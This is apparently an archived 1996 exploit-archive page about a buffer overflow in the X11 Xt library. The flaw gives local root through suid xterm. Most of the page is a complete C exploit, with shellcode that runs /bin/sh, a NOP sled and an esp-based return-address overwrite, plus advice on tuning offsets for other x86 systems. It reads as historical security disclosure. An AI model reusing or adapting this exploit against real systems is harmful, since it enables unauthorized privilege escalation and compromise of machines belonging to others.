Xt library bug xterm exploit

Summary

Description:	The Xt library has a number of buffer overflow vulnerabilities which can be exploited on the suid root programs linked to it.
Author:	"b0z0 bra1n"
Compromise:	root (local)
Vulnerable Systems:	This exploit will work for FreeBSD and with tweaking other x86 operating systems (eg linux). Most systems running any version of X11 prior to Aug '96 are vulnerable
Date:	24 August 1996

Details

Exploit:

From: Aleph One (aleph1@underground.org)
Date: Sat, 24 Aug 1996 02:14:24 -0700 

There exists at least one vulnerability in the Xt library caused by a buffer
overrun that allows arbitrary code to be executed. This vulnerability
exists in the Xt library itself. As such all programs linked with it
that are suid root or can be coerced into running as root are vulnerable.
The standard example is of curse suid xterm. The vulnerability has
been confirmed under FreeBSD, Solaris, and as far as we can tell every
single other OS running all revisions of X11.

There exists a large number of places in the Xt library code where buffers
allocated on the stack are handled insecurly other than the one used on the
fallowing exploit. The Xt library is a can of worms.

The original author of this vulnerability is "b0z0 bra1n".

x86 exploit tested under FreeBSD fallows. For other x86 operating systems
play around with the offset:

#include 
#include 
#include 

#define DEFAULT_OFFSET          0
#define BUFFER_SIZE             1491

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

main(int argc, char **argv)
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
   "\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
   "\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
   "\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
   "\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";

   int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

   if(argc>1)
        ofs=atoi(argv[1]);
   if(argc>2)
        bs=atoi(argv[2]);
   printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
        ofs, get_esp()+ofs, bs);

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, bs-strlen(execshell));
   ptr += bs-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}

Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: